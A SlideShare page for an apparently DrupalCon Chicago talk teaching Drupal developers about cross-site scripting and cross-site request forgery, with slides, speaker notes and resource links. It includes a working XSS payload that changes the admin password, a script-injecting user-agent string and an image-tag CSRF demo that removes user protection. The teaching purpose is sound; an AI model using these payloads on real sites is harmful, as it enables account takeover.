Scout xss csrf_security_presentation_chicago

•

0 gostou•660 visualizações

A Drupalcon Chicago presentation for coders/developers about web application security in the Drupal system. Covering Cross Site Scripting and Cross Site Request Forgeries.

Tecnologia

Your site is vulnerable. (really, it is)

[object Object],Wrote a book Or 40% off with Wiley coupon.

Your site is vulnerable. You can make it safer.

“ A site is secure if private data is kept private, the site cannot be forced ofﬂine or into a degraded mode by a remote visitor, the site resources are used only for their intended purposes, and the site content can be edited only by appropriate users.” Some guy – Cracking Drupal chapter 1

http://www.cenzic.com/downloads/Cenzic_AppSecTrends_Q1-Q2-2009.pdf

[object Object],[object Object],[object Object]

$Anything you can do XSS can do (better) jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) { if (status == 'success') { // Extract the token and other required data var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/); var token = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "form_id": 'user_profile_form', "form_token": token, "pass[pass1]": 'hacked', "pass[pass2]": 'hacked' }; jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload); } } ); } http://crackingdrupal.com/node/8$

Mais conteúdo relacionado

Mais procurados

Presenter: Lavakumar Kuppan Abstract: In a Mobile application pentest the tester focuses on identifying vulnerabilities on both the mobile app and the backend service the app talks to. However, in a web application pentest the client-side is usually ignored and the focus is placed entirely on security issues on the server-side. Modern browsers have several capabilities which make the JS code running in the browser almost as complex powerful as a mobile app and by extension also prone to serious security issues. Most pentesters remain unaware of these security issues and their severity. DOMGoat is an open source application that is developed primarily to help pentesters understand the various client-side security issues that can occur in the DOM. This includes everything from the several variants of DOM XSS to JavaScript cryptography to client-side data leakage and more. This talk will explain the various security issues that affect the DOM and also show how DOMGoat can be used to learn about these issues.

BsidesDelhi 2018: DomGoat - the DOM Security Playground

BSides Delhi

Cached and Confused: Web Cache Deception in the Wild

Sajjad "JJ" Arshad

RESTful Web Services with Spring MVC

digitalsonic

Introduction to Jquery

Gurpreet singh

http://www.powerofcommunity.net/pastcon_2008.html & http://xcon.xfocus.org/XCon2008/index.html The Same Origin Policy is the most talked about security policy which relates to web applications, it is the constraint within browsers that ideally stops active content from different origins arbitrarily communicating with each other. This policy has given rise to the class of bugs known as Cross-Site Scripting (XSS) vulnerabilities, though a more accurate term is usually JavaScript injection, where the ability to force an application to echo crafted data gives an attacker the ability to execute JavaScript within the context of the vulnerable origin. This talk takes the view that the biggest weakness with the Same Origin Policy is that it must be implemented by every component of the browser independently, and if any component implements it differently to other components then the security posture of the browser is altered. As such this talk will examine how the 'Same Origin Policy' is implemented in different circumstances, especially in active content, and where the Same Origin Policy is not really enforced at all.

Same Origin Policy Weaknesses

kuza55

Large-Scale Analysis of Style Injection by Relative Path Overwrite

Sajjad "JJ" Arshad

Case Study of Django: Web Frameworks that are Secure by Default

Mohammed ALDOUB

Web fundamentals - part 1

Bozhidar Boshnakov

Boost and SEO

Tamaghna Banerjee

Evolution Of The Web Platform & Browser Security

Sanjeev Verma, PhD

AtlasCamp 2014: Connect Security

Atlassian

XSS - Do you know EVERYTHING?

Yurii Bilyk

Designing REST services with Spring MVC

Serhii Kartashov

The epicenter of data sharing in "Web 2.0" are web services. Whether you like it or not, you are consuming literally hundreds of services a day, whether it be searching in Google, running Facebook on your mobile device, or searching the App Store on your tablet. Yet, despite our hunger for services, few have ever written one. In this session, you'll learn what are RESTful web services and how to get started creating them in Zend Framework.

REST Easy - Building RESTful Services in Zend Framework

Chris Weldon

Micro Web Service - Slim and JWT

Tuyen Vuong

Join Stormpath Developer Evangelist, Robert Damphousse, to dive deep into browser security. Robert will explain how Session IDs, Man in the Middle (MITM), Cross-Site Scripting (XSS), and Cross-Site Request Forgery (CSRF) attacks work, and how to use cookies to support security best practices. Topics Covered: - Security concerns for modern web apps - Cookies, the right way - MITM, XSS, and CSRF attacks - Session ID problems - Examples in an Angular app

Browser Security 101

Stormpath

Html5 localstorage attack vectors

Shreeraj Shah

Bsidesnova- Pentesting Methodology - Making bits less complicated

Octavio Paguaga

Blind xss

Ronan Dunne, CEH, SSCP

REST Easy with AngularJS - ng-grid CRUD EXAMPLE

reneechemel

Mais procurados (20)

BsidesDelhi 2018: DomGoat - the DOM Security Playground

Cached and Confused: Web Cache Deception in the Wild

RESTful Web Services with Spring MVC

Introduction to Jquery

Same Origin Policy Weaknesses

Large-Scale Analysis of Style Injection by Relative Path Overwrite

Case Study of Django: Web Frameworks that are Secure by Default

Web fundamentals - part 1

Boost and SEO

Evolution Of The Web Platform & Browser Security

AtlasCamp 2014: Connect Security

XSS - Do you know EVERYTHING?

Designing REST services with Spring MVC

REST Easy - Building RESTful Services in Zend Framework

Micro Web Service - Slim and JWT

Browser Security 101

Html5 localstorage attack vectors

Bsidesnova- Pentesting Methodology - Making bits less complicated

Blind xss

REST Easy with AngularJS - ng-grid CRUD EXAMPLE

Semelhante a Scout xss csrf_security_presentation_chicago

Drupal Security for Coders and Themers - XSS and CSRF

knaddison

JavaScript 2.0 in Dreamweaver CS4

alexsaves

It is not HTML5. but ... / HTML5ではないサイトからHTML5を考える

Sadaaki HIRAI

Grails Introduction - IJTC 2007

Guillaume Laforge

Perchè potresti aver bisogno di un database NoSQL anche se non sei Google o F...

Codemotion

W3 conf hill-html5-security-realities

Brad Hill

Intro to mobile web application development

zonathen

The Magic Revealed: Four Real-World Examples of Using the Client Object Model...

SPTechCon

[Coscup 2012] JavascriptMVC

Alive Kuo

This is an updated version of this talk given at DrupalCamp Atlanta (DCA) This presentation is an overview / case study of things learned by experiencing GDPR Security audits, DoS attacks, brute force login attacks, annoying robot crawlers, and hackers doing security probes. The session will cover the following main topics with tips on how to protected against each of these. An overview of security threats Server Level Attacks Code Level Attacks User Access Attacks Internal Attacks Some suggestions on developing a security plan People attending should come away with useful knowledge (modules, best practices, sites that help, front end tools and the like) that will help secure their sites.

Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)

cgmonroe

#NewMeetup Performance

Justin Cataldo

SharePoint Cincy 2012 - jQuery essentials

Mark Rackley

12 core technologies you should learn, love, and hate to be a 'real' technocrat

Jonathan Linowes

Advanced Web Development

Robert J. Stein

Micro frontends

Kleyson Prado

12 core technologies you should learn, love, and hate to be a 'real' technocrat

linoj

Familiar HTML5 - 事例とサンプルコードから学ぶ身近で普通に使わているHTML5

Sadaaki HIRAI

Grails and Dojo

Sven Haiges

Client-side JavaScript Vulnerabilities

Ory Segal

Does my DIV look big in this?

glen_a_smith

Semelhante a Scout xss csrf_security_presentation_chicago (20)

Drupal Security for Coders and Themers - XSS and CSRF

JavaScript 2.0 in Dreamweaver CS4

It is not HTML5. but ... / HTML5ではないサイトからHTML5を考える

Grails Introduction - IJTC 2007

Perchè potresti aver bisogno di un database NoSQL anche se non sei Google o F...

W3 conf hill-html5-security-realities

Intro to mobile web application development

The Magic Revealed: Four Real-World Examples of Using the Client Object Model...

[Coscup 2012] JavascriptMVC

Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)

#NewMeetup Performance

SharePoint Cincy 2012 - jQuery essentials

12 core technologies you should learn, love, and hate to be a 'real' technocrat

Advanced Web Development

Micro frontends

12 core technologies you should learn, love, and hate to be a 'real' technocrat

Familiar HTML5 - 事例とサンプルコードから学ぶ身近で普通に使わているHTML5

Grails and Dojo

Client-side JavaScript Vulnerabilities

Does my DIV look big in this?

Último

The 7 Things I Know About Cyber Security After 25 Years | April 2024

Rafal Los

A Domino Admins Adventures (Engage 2024)

Gabriella Davis

Three things you will take away from the session: • How to run an effective tenant-to-tenant migration • Best practices for before, during, and after migration • Tips for using migration as a springboard to prepare for Copilot in Microsoft 365 Main ideas: Migration Overview: The presentation covers the current reality of cross-tenant migrations, the triggers, phases, best practices, and benefits of a successful tenant migration Considerations: When considering a migration, it is important to consider the migration scope, performance, customization, flexibility, user-friendly interface, automation, monitoring, support, training, scalability, data integrity, data security, cost, and licensing structure Next Wave: The next wave of change includes the launch of Copilot, which requires businesses to be prepared for upcoming changes related to Copilot and the cloud, and to consolidate data and tighten governance ShareGate: ShareGate can help with pre-migration analysis, configurable migration tool, and automated, end-user driven collaborative governance

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff

sammart93

How to convert PDF to text with Nanonets

naman860154

🐬 The future of MySQL is Postgres 🐘

RTylerCroy

CNv6 Instructor Chapter 6 Quality of Service

giselly40

What are drone anti-jamming systems? The drone anti-jamming systems and anti-spoof technology protect against interference, jamming, and spoofing of the UAVs. To protect their security, countries are beginning to research drone anti-jamming systems, also known as drone strike weapons. The anti-jam and anti-spoof technology protects against interference, jamming and spoofing. A drone strike weapon is a drone attack weapon that can attack and destroy enemy drones. So what is so unique about this amazing system?

What Are The Drone Anti-jamming Systems Technology?

Antenna Manufacturer Coco

How to Troubleshoot Apps for the Modern Connected Worker

ThousandEyes

Histor y of HAM Radio presentation slide

vu2urc

Discord is a free app offering voice, video, and text chat functionalities, primarily catering to the gaming community. It serves as a hub for users to create and join servers tailored to their interests. Discord’s ecosystem comprises servers, each functioning as a distinct online community with its own channels dedicated to specific topics or activities. Users can engage in text-based discussions, voice calls, or video chats within these channels. Understanding Discord Servers Discord servers are virtual spaces where users congregate to interact, share content, and build communities. Servers may revolve around gaming, hobbies, interests, or fandoms, providing a platform for like-minded individuals to connect. Communication Features Discord offers a range of communication tools, including text channels for messaging, voice channels for real-time audio conversations, and video channels for face-to-face interactions. These features facilitate seamless communication and collaboration. What Does NSFW Mean? The acronym NSFW stands for “Not Safe For Work,” indicating content that may be inappropriate for professional or public settings. NSFW Content NSFW content encompasses material that is sexually explicit, violent, or otherwise graphic in nature. It often includes nudity, profanity, or depictions of sensitive topics.

Understanding Discord NSFW Servers A Guide for Responsible Users.pdf

UK Journal

As privacy and data protection regulations evolve rapidly, organizations operating in multiple jurisdictions face mounting challenges to ensure compliance and safeguard customer data. With state-specific privacy laws coming up in multiple states this year, it is essential to understand what their unique data protection regulations will require clearly. How will data privacy evolve in the US in 2024? How to stay compliant? Our panellists will guide you through the intricacies of these states' specific data privacy laws, clarifying complex legal frameworks and compliance requirements. This webinar will review: - The essential aspects of each state's privacy landscape and the latest updates - Common compliance challenges faced by organizations operating in multiple states and best practices to achieve regulatory adherence - Valuable insights into potential changes to existing regulations and prepare your organization for the evolving landscape

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments

TrustArc

Enterprise Knowledge’s Urmi Majumder, Principal Data Architecture Consultant, and Fernando Aguilar Islas, Senior Data Science Consultant, presented "Driving Behavioral Change for Information Management through Data-Driven Green Strategy" on March 27, 2024 at Enterprise Data World (EDW) in Orlando, Florida. In this presentation, Urmi and Fernando discussed a case study describing how the information management division in a large supply chain organization drove user behavior change through awareness of the carbon footprint of their duplicated and near-duplicated content, identified via advanced data analytics. Check out their presentation to gain valuable perspectives on utilizing data-driven strategies to influence positive behavioral shifts and support sustainability initiatives within your organization. In this session, participants gained answers to the following questions: - What is a Green Information Management (IM) Strategy, and why should you have one? - How can Artificial Intelligence (AI) and Machine Learning (ML) support your Green IM Strategy through content deduplication? - How can an organization use insights into their data to influence employee behavior for IM? - How can you reap additional benefits from content reduction that go beyond Green IM?

Driving Behavioral Change for Information Management through Data-Driven Gree...

Enterprise Knowledge

Handwritten Text Recognition for manuscripts and early printed texts

Maria Levchenko

Heather Hedden, Senior Consultant at Enterprise Knowledge, presented “The Role of Taxonomy and Ontology in Semantic Layers” at a webinar hosted by Progress Semaphore on April 16, 2024. Taxonomies at their core enable effective tagging and retrieval of content, and combined with ontologies they extend to the management and understanding of related data. There are even greater benefits of taxonomies and ontologies to enhance your enterprise information architecture when applying them to a semantic layer. A survey by DBP-Institute found that enterprises using a semantic layer see their business outcomes improve by four times, while reducing their data and analytics costs. Extending taxonomies to a semantic layer can be a game-changing solution, allowing you to connect information silos, alleviate knowledge gaps, and derive new insights. Hedden, who specializes in taxonomy design and implementation, presented how the value of taxonomies shouldn’t reside in silos but be integrated with ontologies into a semantic layer. Learn about: - The essence and purpose of taxonomies and ontologies in information and knowledge management; - Advantages of semantic layers leveraging organizational taxonomies; and - Components and approaches to creating a semantic layer, including the integration of taxonomies and ontologies

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf

Enterprise Knowledge

Scaling API-first – The story of a global engineering organization

Radu Cotescu

Finology Group – Insurtech Innovation Award 2024

The Digital Insurer

Building Digital Trust in a Digital Economy Veronica Tan, Director - Cyber Security Agency of Singapore Apidays Singapore 2024: Connecting Customers, Business and Technology (April 17 & 18, 2024) ------ Check out our conferences at https://www.apidays.global/ Do you want to sponsor or talk at one of our conferences? https://apidays.typeform.com/to/ILJeAaV8 Learn more on APIscene, the global media made by the community for the community: https://www.apiscene.io Explore the API ecosystem with the API Landscape: https://apilandscape.apiscene.io/

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...

apidays

The presentation explores the development and application of artificial intelligence (AI) from its inception to its current status in the modern world. The term "artificial intelligence" was first coined by John McCarthy in 1956 to describe efforts to develop computer programs capable of performing tasks that typically require human intelligence. This concept was first introduced at a conference held at Dartmouth College, where programs demonstrated capabilities such as playing chess, proving theorems, and interpreting texts. In the early stages, Alan Turing contributed to the field by defining intelligence as the ability of a being to respond to certain questions intelligently, proposing what is now known as the Turing Test to evaluate the presence of intelligent behavior in machines. As the decades progressed, AI evolved significantly. The 1980s focused on machine learning, teaching computers to learn from data, leading to the development of models that could improve their performance based on their experiences. The 1990s and 2000s saw further advances in algorithms and computational power, which allowed for more sophisticated data analysis techniques, including data mining. By the 2010s, the proliferation of big data and the refinement of deep learning techniques enabled AI to become mainstream. Notable milestones included the success of Google's AlphaGo and advancements in autonomous vehicles by companies like Tesla and Waymo. A major theme of the presentation is the application of generative AI, which has been used for tasks such as natural language text generation, translation, and question answering. Generative AI uses large datasets to train models that can then produce new, coherent pieces of text or other media. The presentation also discusses the ethical implications and the need for regulation in AI, highlighting issues such as privacy, bias, and the potential for misuse. These concerns have prompted calls for comprehensive regulations to ensure the safe and equitable use of AI technologies. Artificial intelligence has also played a significant role in healthcare, particularly highlighted during the COVID-19 pandemic, where it was used in drug discovery, vaccine development, and analyzing the spread of the virus. The capabilities of AI in healthcare are vast, ranging from medical diagnostics to personalized medicine, demonstrating the technology's potential to revolutionize fields beyond just technical or consumer applications. In conclusion, AI continues to be a rapidly evolving field with significant implications for various aspects of society. The development from theoretical concepts to real-world applications illustrates both the potential benefits and the challenges that come with integrating advanced technologies into everyday life. The ongoing discussion about AI ethics and regulation underscores the importance of managing these technologies responsibly to maximize their their benefits while minimizing potential harms.

Artificial Intelligence: Facts and Myths

Joaquim Jorge

ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke

Product Anonymous

GenAI Risks & Security Meetup 01052024.pdf

lior mazor

Scout xss csrf_security_presentation_chicago

2. Your site is vulnerable. (really, it is)

4. Drupal Association

5. Help with lots of d.o

6. 20+ modules (Pathauto, token)

7. On Security Team

8. MasteringDrupal.com

9. DrupalDashboard.com

10. @greggles Greg

11.

12.

13. Community focused

14. Progressive

15. Event management

16. Now....

17. Security

18. (with Ben) ->

19. I want you: To think like a hacker

20.

21. Disney Princess Castle!

22.

23.

24. Your site is vulnerable. You can make it safer.

25. “ A site is secure if private data is kept private, the site cannot be forced ofﬂine or into a degraded mode by a remote visitor, the site resources are used only for their intended purposes, and the site content can be edited only by appropriate users.” Some guy – Cracking Drupal chapter 1

26.

27. Stealing data

28. Altering data

29.

30. http://www.cenzic.com/downloads/Cenzic_AppSecTrends_Q1-Q2-2009.pdf

31.

32.

33.

34.

35.

36.

37.

38.

39.

40.

41. Anything you can do XSS can do (better) jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) { if (status == 'success') { // Extract the token and other required data var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/); var token = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "form_id": 'user_profile_form', "form_token": token, "pass[pass1]": 'hacked', "pass[pass2]": 'hacked' }; jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload); } } ); } http://crackingdrupal.com/node/8

42. demo time

43.

44.

45. Rely on your module developer for variables

46. Run the tests

47. Developers (and themers) Where does this text come from? Is there a way a user can change it? In what context is it being used?

48.

49.

50. Database context

51. Web context

52. Server context Take an hour: http://acko.net/blog/safe-string-theory-for-the-web

53.

54.

55. Without confirming intent

56. AKA CSRF

57.

58.

59.

60.

61.

62.

63. BOF at 3:15 in Arkansas room

64.

65. http://drupal.org/security

66. http://drupal.org/writing-secure-code

67. http://groups.drupal.org/node/15254 - discussion group

68. http://heine.familiedeelstra.com/

69. Cracking Drupal - http://crackingdrupal.com

70. http://crackingdrupal.com/node/34 - XSS Cheat Sheet

71. http://crackingdrupal.com/node/48 - CSRF

72. http://www.drupalsecurityreport.org

73.

Notas do Editor

Maybe you don't know it, but it is.
I'm pretty awesome.
It's pretty awesome.
Damn, they're really awesome.
DO NOT LIKE Resources: * DDOS * Mail forwarding for spam * Bot network Stealing data * E-mails * Username/passwords * Worse? (credit card, ssn, etc.) Altering data * Homepage defacement * Changing prices in e-commerce * Deleting content http://www.flickr.com/photos/piez/995290158/
XSS is the worst! Only for vulnerabilities fixed from d.o security team process, but anecdotally we know XSS is the worst! What about real world? Most people don't want to report their weaknesses.
For the Irving Berlin fans out there Javascript can do everything that you can do on the site. If you are logged in as an admin user, it can edit any users password, change permissions, etc.
2. Demonstrate weak code. XSS is from “user input” - ALL user input! Including browser user agent! ### SETUP NOTES: 1. Install browscap and monitor user agents 2. Setup firefox useragent switcher with a useragent like <script>$(&quot;body&quot;).replaceWith(&quot;<h1>now what</h1>?&quot;);</script>
tpl.php and default theme_* implementations will show where to use check_plain etc. Good developers should know when/where/how to filter text, let them worry about it and hand you simple variables via preprocess functions.
Whenever you deal with assembling bits of text for output consider these three questions. Answers will determine whether any filtering is required. User agent in http request to include a file?
Data comes in from 'you' (or a malicious user) Goes to MySQL in some queries, MySQL returns data Data is returned to you What are the “Contexts” in this page request flow? MySQL context in step 2 Your browser in step 4
Steven Wittens wrote this up way better than anyone else. If you don't have an hour and don't have a themer or developer...use the cheat sheet
You deal with a string Input comes in, any yes answer drops down, HTML output at the bottom. Sometimes we use the underlying function like check_url via a convenience function like l(). Ditto check_plain via t(). Rich text may contain html, may contain Wiki formatting. Trusted text is way less than 1% of the text on a site.
3 rd most common, 2 nd hardest to “solve”
User Protect module http://drupal.org/node/623162 Enable Go to admin/user/userprotect View Delete problem Create a node with <img src=” http://6d.local/userprotect/delete/1/user “> or a tinyurl or...or be sure to fix the “smart quotes” Refresh admin/user/userprotect – no longer protected!

Scout xss csrf_security_presentation_chicago

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Semelhante a Scout xss csrf_security_presentation_chicago

Semelhante a Scout xss csrf_security_presentation_chicago (20)

Último

Último (20)

Scout xss csrf_security_presentation_chicago

Notas do Editor